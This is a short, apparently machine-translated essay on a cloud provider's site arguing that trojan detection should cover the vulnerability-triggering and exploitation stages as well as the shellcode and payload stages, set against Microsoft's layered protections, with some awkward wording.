Technical System of Trojan Detection from the perspective of vulnerability Attack Process

Source: Internet
Author: User

Flashsky

Currently, there are four steps to take advantage of the vulnerability, including Trojan Horse mounting.

1. Vulnerability triggering

2. Vulnerability Exploitation

3. execute SHELLCODE

4. DOWNLOAD/virus/Trojan/backdoor DOWNLOAD execution

Of course, these four steps do not exist in every vulnerability exploitation. For example, some logic vulnerabilities, vulnerability triggering and exploits are one thing. For some attacks, there may be no steps to DOWNLOAD/virus/Trojan/backdoor. however, for most memory-related vulnerabilities, these four steps are basically involved.

Then, the technologies related to attack research are

1. Vulnerability mining technology to discover vulnerabilities

2. Vulnerability exploitation technology to enable vulnerability Exploitation
3. SHELLCODE skills and confrontation Technologies
4. Virus Technology

In contrast, we can summarize the overall MS protection system.

1. SDL process, including source code audit, SAL, and security testing to reduce vulnerabilities
2. Operating System Protection Systems: GS, heap protection, SAFESEH, ASLR, etc., to prevent attackers from using or reducing the available level
3. DEP to prevent SHELLCODE Execution
4. DEFENDER, UAC, anti-virus, Trojan, etc.


Currently, trojan detection is generally concentrated on 3, 4. Based on the vulnerability exploitation logic, when attackers execute SHELLCODE, in essence, it has the same permissions as the detection technology, and can fully implement confrontation. for example, the detection API, unhook api, raster detection API, stop detection engine, and find detection engine to terminate attacks. therefore, it is necessary to assist Step 1 and Step 2 for detection (because at the time of step 2, the attacker is not able to detect and confront the detection, of course, in addition to knowing your IP address). At the same time, many vulnerabilities may have a certain probability of success. The environment requires that the SHELLCODE may not be successfully executed, and the attack must be detected at Layer 1 or 2. currently, only some simple feature detection technologies are available for 1, 2. these simple feature detection methods can easily escape detection through dynamic technologies. this requires that trojan detection support 1. completely dynamic technology for confrontation, 2. from the vulnerability mechanism, more detection is performed when a vulnerability is triggered and exploited. to help defend against attacks on Layer 3 and Layer 3.

Trojan Horse detection should also follow the layer-4 above to implement three-dimensional and multi-level detection, in order to gain an advantage in the long-term confrontation with Trojan Horse. knowing that chuangyu's trojan detection system is a multi-level detection system based on the above model.

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.